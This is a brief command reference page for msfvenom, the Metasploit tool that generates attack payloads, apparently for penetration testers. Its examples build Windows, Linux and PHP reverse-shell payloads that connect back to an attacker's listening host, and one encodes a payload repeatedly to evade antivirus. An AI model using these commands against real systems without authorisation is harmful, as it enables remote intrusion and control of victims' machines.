msfvenom
generates payloads for Metasploit
TLDR
List payloads
$ msfvenom -l payloads
List encoders$ msfvenom -l encoders
Generate Windows reverse shell$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=[192.168.1.10] LPORT=[4444] -f exe > [shell.exe]
Generate Linux payload$ msfvenom -p linux/x86/shell_reverse_tcp LHOST=[192.168.1.10] LPORT=[4444] -f elf > [shell.elf]
Encode payload$ msfvenom -p [payload] -e x86/shikata_ga_nai -i [5] -f exe > [encoded.exe]
Generate shellcode$ msfvenom -p [payload] -f c
Generate web payload$ msfvenom -p php/meterpreter/reverse_tcp LHOST=[ip] LPORT=[port] -f raw > [shell.php]
SYNOPSIS
msfvenom [options]
DESCRIPTION
msfvenom generates payloads for Metasploit. It combines msfpayload and msfencode functionality.
The tool creates shellcode and executables. Supports encoding and format conversion.
PARAMETERS
-p PAYLOAD
Payload to use.-f FORMAT
Output format.-e ENCODER
Encoder to use.-i COUNT
Encoding iterations.-l TYPE
List available items.LHOST
Local host address.LPORT
Local port number.--help
Display help information.
CAVEATS
Authorized testing only. AV may detect payloads. Part of Metasploit Framework.
HISTORY
msfvenom replaced msfpayload and msfencode in Metasploit Framework, unifying payload generation.
SEE ALSO
msfconsole(1), msfpc(1), nmap(1)
